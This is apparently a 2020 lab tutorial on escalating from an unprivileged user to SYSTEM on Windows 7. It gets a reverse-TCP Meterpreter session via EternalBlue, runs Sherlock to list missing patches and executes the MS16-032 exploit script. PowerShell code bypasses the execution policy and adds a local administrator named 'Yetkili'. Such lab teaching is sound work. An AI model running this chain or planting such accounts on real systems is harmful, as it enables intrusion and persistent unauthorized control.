Windows Privilege Escalation with Sherlock

Ayşegül Arpacık
6 min readJul 17, 2020


In this article, privilege escalation is performed from Kali Linux against a Windows 7 target, both installed as virtual machines in VMware Workstation. Basic terminal usage and the virtual machine setup are assumed throughout.

What is Privilege Escalation?

As we know, the main aim in a penetration test is to end up as the most privileged user. If we got into the system as the system administrator, or the vulnerable application or service already runs with administrator rights, there is nothing more to do on this front. But if the foothold we obtained runs under an account with fewer rights than the administrator, we need to follow a number of methods to reach administrator rights. Knowing these paths also matters defensively: it shows which systems are in a dangerous state and need to be fixed. In short, the aim of privilege escalation is to access data and actions that ordinary users cannot.

There are many privilege escalation tools and techniques. Some of them are:

  • Sherlock
  • JAWS — Just Another Windows (Enum) Script
  • Windows Privesc Check (WPC-PS)
  • PowerUp
  • BeRoot
  • DLL Injection
  • Token Manipulation
  • SessionGopher
  • Windows Kernel Exploit
  • DLL Hijacking …

In this article, the Sherlock method is demonstrated in practice.

What is Sherlock?

Sherlock is a PowerShell script (written by rasta-mouse) that quickly checks a Windows host for missing patches that allow privilege escalation. It does not exploit anything: it compares the versions of specific system files against the versions Microsoft shipped in the fix, so its verdict is a strong hint rather than proof. The script runs on the Windows target; in this walkthrough it is driven from Kali Linux through a Meterpreter session, so the required commands are PowerShell commands executed on the Windows system. (Sherlock is no longer maintained; its author's successor is Watson, but the workflow shown here is the same.)

Downloading the Sherlock module

First, we download Sherlock (a single file, Sherlock.ps1) from the Kali Linux terminal, for example by cloning its GitHub repository.

Finding the IP address of the Windows system

For Kali Linux to reach the Windows 7 system, both virtual machines must be on the same virtual network. In VMware Workstation this is set per machine under Settings, Network Adapter: either NAT or a custom VMnet. In this walkthrough both systems use NAT.

Since both operating systems are on the same network, we can easily find the IP address of the Windows system from the Kali Linux terminal.

nbtscan, which comes installed on Kali Linux, sends NetBIOS name queries (NBT-NS, UDP port 137) to every address in a given range and lists the hosts that answer together with their NetBIOS names. Windows hosts with NetBIOS over TCP/IP enabled, the default, typically answer, which makes it a quick way to tell which addresses are alive Windows machines.

Running nbtscan against the VMnet subnet, we see that the IP address of the Windows system is 192.168.119.132.

Getting a Meterpreter shell on the Windows system

As the next step, we need to get a Meterpreter shell on the Windows system.

A shell is the interface through which a user enters commands and has them carried out by the operating system. Meterpreter is the Metasploit Framework's post-exploitation payload: an agent that runs in memory on the target and gives the tester a command line with file transfer, process control and loadable extensions, including one for running PowerShell.

First of all, we launch the Metasploit Framework (msfconsole).

Then we search for the EternalBlue modules (search eternalblue). Briefly, EternalBlue is an exploit for a flaw in Microsoft's SMBv1 implementation (MS17-010, CVE-2017-0144). It was developed by the US National Security Agency (NSA) and leaked by the Shadow Brokers in April 2017; a Windows 7 machine without the March 2017 update is vulnerable to it.

We select the module we will use by the path shown in the Name column on the left; for Windows 7 this is exploit/windows/smb/ms17_010_eternalblue.

Now we need to set a payload to get a Meterpreter session. Briefly, a payload is the code the exploit delivers and runs on the target once the vulnerability has been triggered. Here it is a reverse Meterpreter payload (for example windows/x64/meterpreter/reverse_tcp on 64-bit Windows 7), which connects back to our Kali machine.

As a last step, we set the two IP addresses as parameters: RHOSTS is the victim, the Windows 7 machine at 192.168.119.132, and LHOST is our Kali machine, the address the Meterpreter payload connects back to. Getting these two the wrong way round is the most common reason a session never arrives.

Then we run exploit.

Once the module prints WIN, the Meterpreter prompt appears: the exploit succeeded and we have a session on the Windows system.

Listing vulnerabilities with Powershell

As mentioned above, Sherlock is a PowerShell script that scans a Windows system for privilege-escalation vulnerabilities, so the remaining steps are PowerShell commands run on the target.

First of all, from the Meterpreter prompt we load the PowerShell extension (load powershell). It adds commands for importing scripts into a PowerShell runspace on the target and executing commands in it, without writing Sherlock.ps1 to the target's disk.

We import the Sherlock.ps1 file with powershell_import, giving the path on Kali where we downloaded it earlier.

Now we can list the vulnerabilities on the Windows system by running Sherlock's main function, Find-AllVulns, through powershell_execute.

For each check, the output lists the vulnerability's title, its Microsoft bulletin and CVE identifiers, a link with details (usually a public exploit), and the VulnStatus: Appears Vulnerable, Not Vulnerable, or, for checks that only apply to 32-bit Windows, Not supported on 64-bit systems.

An Appears Vulnerable status does not guarantee that the exploit will work: Sherlock decides from file versions, not by exploiting, and an exploit can still fail because of the architecture, a mitigation, or a race it loses. One working exploit is enough to create a privileged user on the system.
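To make the status column concrete, here is an added example (my own code, not Sherlock's) of how a Sherlock-style check arrives at Appears Vulnerable, and of the cross-check the status column does not give you. seclogon.dll is the file Sherlock examines for MS16-032; the fixed version passed as -Fixed is a placeholder, and the KB number is the package commonly associated with MS16-032 on Windows 7 and should be confirmed against the Microsoft bulletin for your build branch.

```powershell
# Added example, not Sherlock's own code. Shows the two ways to decide whether
# a host is missing the MS16-032 fix: the file-version comparison Sherlock
# relies on, and a Get-HotFix lookup as a second opinion.
# Assumptions: seclogon.dll is the file the Sherlock check examines; the
# -Fixed version below is a placeholder and the KB number must be confirmed
# against the Microsoft bulletin for your build branch.

function Get-DllVersion {
    param([Parameter(Mandatory=$true)][string]$Path)
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    # Build a System.Version from the numeric parts; comparing the FileVersion
    # string would be lexical ("6.1.7601.9999" sorts after "6.1.7601.19345").
    New-Object System.Version -ArgumentList @($vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart)
}

function Get-PatchStatus {
    param(
        [Parameter(Mandatory=$true)][string]$Path,            # file touched by the fix
        [Parameter(Mandatory=$true)][System.Version]$Fixed,   # version shipped with the fix
        [string[]]$KBIds = @()                                # KB package(s) of the fix, if known
    )
    $have = Get-DllVersion -Path $Path

    # A version threshold is only meaningful within one build branch
    # (7601 = Windows 7 SP1); a different build needs its own threshold.
    if ($have.Build -ne $Fixed.Build) {
        $byFile = "Unknown (file build $($have.Build), threshold is for build $($Fixed.Build))"
    } elseif ($have -ge $Fixed) {
        $byFile = 'Not Vulnerable'
    } else {
        $byFile = 'Appears Vulnerable'
    }

    # Second opinion: is one of the fix's KB packages listed as installed?
    $installed = @(Get-HotFix | ForEach-Object { $_.HotFixID })
    $byKb = $false
    foreach ($kb in $KBIds) { if ($installed -contains $kb) { $byKb = $true } }

    # A KB listed while the file is still old usually means the update is
    # staged but the machine has not rebooted; flag it rather than trust it.
    $verdict = $byFile
    if ($byFile -eq 'Appears Vulnerable' -and $byKb) {
        $verdict = 'Appears Vulnerable (KB listed as installed, reboot pending?)'
    }

    New-Object PSObject -Property @{
        File        = $Path
        FileVersion = $have.ToString()
        ByFile      = $byFile
        KBInstalled = $byKb
        Verdict     = $verdict
    }
}

# Usage on a Windows 7 SP1 host. The version is a placeholder and the KB
# should be confirmed in the MS16-032 bulletin for this build branch.
Get-PatchStatus -Path "$env:windir\system32\seclogon.dll" `
                -Fixed ([System.Version]'6.1.7601.19999') `
                -KBIds @('KB3139914') | Format-List
```

The file-version test is what makes Sherlock fast and disk-only, and it is also why its answer is "Appears": it cannot see whether the vulnerable code path is reachable, only whether the fixed binary is present. Get-HotFix is the cheap sanity check on a host you administer; on an engagement it also tells you when a patch is installed but not yet active.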

Of the Appears Vulnerable entries, we can use MS16-032 (CVE-2016-0099, a handle leak in the Secondary Logon service) and MS16-135 (CVE-2016-7255, a win32k.sys bug).

To use MS16-032, we open the address given in the Link column, save the script in Notepad as ms16-032.ps1, and copy this file to the Windows desktop.

Exploiting the vulnerabilities on the Windows system

On the Windows system, whoami shows our user name and, if the machine is domain-joined, the domain we belong to. Here we see the unprivileged user in the domain I created under my own name.

We start PowerShell with the execution policy set to Bypass so that the unsigned script is allowed to run.

We import (dot-source) the ms16-032.ps1 file we copied to the Windows desktop and run its function.

Before this step our user was an unprivileged domain user; afterwards, whoami in the shell the exploit spawns reports NT AUTHORITY\SYSTEM, the local system account, which outranks even the administrator.

After this step, we can create a privileged user and add it to the local Administrators group.

First we create a user named Yetkili with a password of our choice, then we add this user to the Administrators group.
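Putting the Windows-side steps together, here is the sequence as PowerShell, added as an example (my own code, not the article's screenshots or the exploit author's script). Assumed: the script saved from Sherlock's Link sits on the desktop as ms16-032.ps1 and defines a function named Invoke-MS16-032, the name used in the Exploit-DB version; the user name Yetkili comes from the article, and the low-privilege account name and the password are made up.

```powershell
# Added example, not the article's own commands or the exploit author's code.
# Part A runs as the low-privilege user; Part B runs in the cmd.exe that the
# exploit spawns as SYSTEM. Assumption: the script saved from the Link is
# ms16-032.ps1 on the desktop and its function is named Invoke-MS16-032.

# --- Part A: low-privilege PowerShell started on the desktop ---
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force   # this process only
whoami                                     # e.g. LAB\lowuser (constructed name)
. "$env:USERPROFILE\Desktop\ms16-032.ps1"  # dot-source so the function is defined here
Invoke-MS16-032                            # on success a new cmd.exe opens running as SYSTEM

# --- Part B: in that SYSTEM cmd.exe, start powershell and run the rest ---
function New-LocalAdmin {
    param(
        [Parameter(Mandatory=$true)][string]$UserName,
        [Parameter(Mandatory=$true)][string]$Password   # 14 chars or fewer: net user prompts otherwise
    )
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    if (-not $id.IsSystem) {
        throw "Expected to run as SYSTEM, but this shell is $($id.Name); run the exploit first."
    }
    # Resolve the Administrators group by well-known SID (S-1-5-32-544) so the
    # call also works on localized Windows, where the group has another name.
    $sid   = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'
    $group = ($sid.Translate([System.Security.Principal.NTAccount]).Value -split '\\')[-1]

    & net user $UserName $Password /add | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "net user failed with exit code $LASTEXITCODE" }
    & net localgroup $group $UserName /add | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "net localgroup failed with exit code $LASTEXITCODE" }

    # Verify instead of assuming: the account must now appear in the group listing.
    $members = & net localgroup $group
    return [bool]($members -contains $UserName)
}

New-LocalAdmin -UserName 'Yetkili' -Password 'Yetk1li!2020'   # password constructed; returns True on success
# Clean up when the assessment is over:  net user Yetkili /delete
```

Two practitioner details are baked in: the execution-policy change is scoped to the process, so nothing is left weakened on the machine, and the new account is verified in the group listing rather than assumed, because net localgroup silently succeeds on some inputs you did not intend. Remove the account when the engagement ends.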

MS16-135 can be used the same way: following the steps we used for MS16-032, with the script from its own Link column, we can again create a privileged user.

Result

In the end, starting from an unprivileged user on a Windows system, we created a privileged user. The exercise also shows the defence: installing the updates that Sherlock reports as missing closes these paths before they can lead to real damage or data loss. Thanks for reading this article! See you in the next one.
